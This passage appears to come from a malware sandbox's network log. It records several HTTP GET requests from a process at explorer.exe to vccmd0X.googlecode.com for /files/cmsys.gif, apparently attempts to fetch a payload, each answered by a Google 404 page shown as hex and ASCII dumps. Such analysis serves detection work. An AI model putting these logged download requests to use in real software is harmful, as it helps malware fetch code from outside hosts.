6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 20 30 25 20 30 25 2f 31 30 30 25 20 31 30 30 25 3b 2d 6d 6f 7a 2d 62 6f 72 64 65 72 2d 69 6d 61 67 65 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 30 7d 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> {margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) 0}}@media only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/brand

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.5	49721	74.125.143.82	80	C:\Windows\System\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Apr 12, 2021 08:59:39.211385012 CEST	1026	OUT	GET /files/cmsys.gif HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko Host: vccmd03.googlecode.com Connection: Keep-Alive
Apr 12, 2021 08:59:39.259001017 CEST	1027	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1576 Date: Mon, 12 Apr 2021 06:59:39 GMT Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 20 30 25 20 30 25 2f 31 30 30 25 20 31 30 30 25 3b 2d 6d 6f 7a 2d 62 6f 72 64 65 72 2d 69 6d 61 67 65 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 30 7d 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> {margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) 0}}@media only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/brand

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
6	192.168.2.5	49723	74.125.143.82	80	C:\Windows\System\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Apr 12, 2021 08:59:43.583110094 CEST	1489	OUT	GET /files/cmsys.gif HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko Host: vccmd01.googlecode.com Connection: Keep-Alive
Apr 12, 2021 08:59:43.630793095 CEST	1490	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1576 Date: Mon, 12 Apr 2021 06:59:43 GMT Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 20 30 25 20 30 25 2f 31 30 30 25 20 31 30 30 25 3b 2d 6d 6f 7a 2d 62 6f 72 64 65 72 2d 69 6d 61 67 65 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 30 7d 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> {margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) 0}}@media only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/brand

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
7	192.168.2.5	49725	74.125.143.82	80	C:\Windows\System\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Apr 12, 2021 08:59:45.075444937 CEST	1525	OUT	GET /files/cmsys.gif HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko Host: vccmd02.googlecode.com Connection: Keep-Alive
Apr 12, 2021 08:59:45.123492002 CEST	1529	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1576 Date: Mon, 12 Apr 2021 06:59:45 GMT Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 20 30 25 20 30 25 2f 31 30 30 25 20 31 30 30 25 3b 2d 6d 6f 7a 2d 62 6f 72 64 65 72 2d 69 6d 61 67 65 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 30 7d 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> {margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) 0}}@media only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/brand

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
8	192.168.2.5	49726	74.125.143.82	80	C:\Windows\System\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Apr 12, 2021 08:59:46.943470001 CEST	1535	OUT	GET /files/cmsys.gif HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko Host: vccmd03.googlecode.com Connection: Keep-Alive
Apr 12, 2021 08:59:46.990906000 CEST	1536	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1576 Date: Mon, 12 Apr 2021 06:59:46 GMT Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 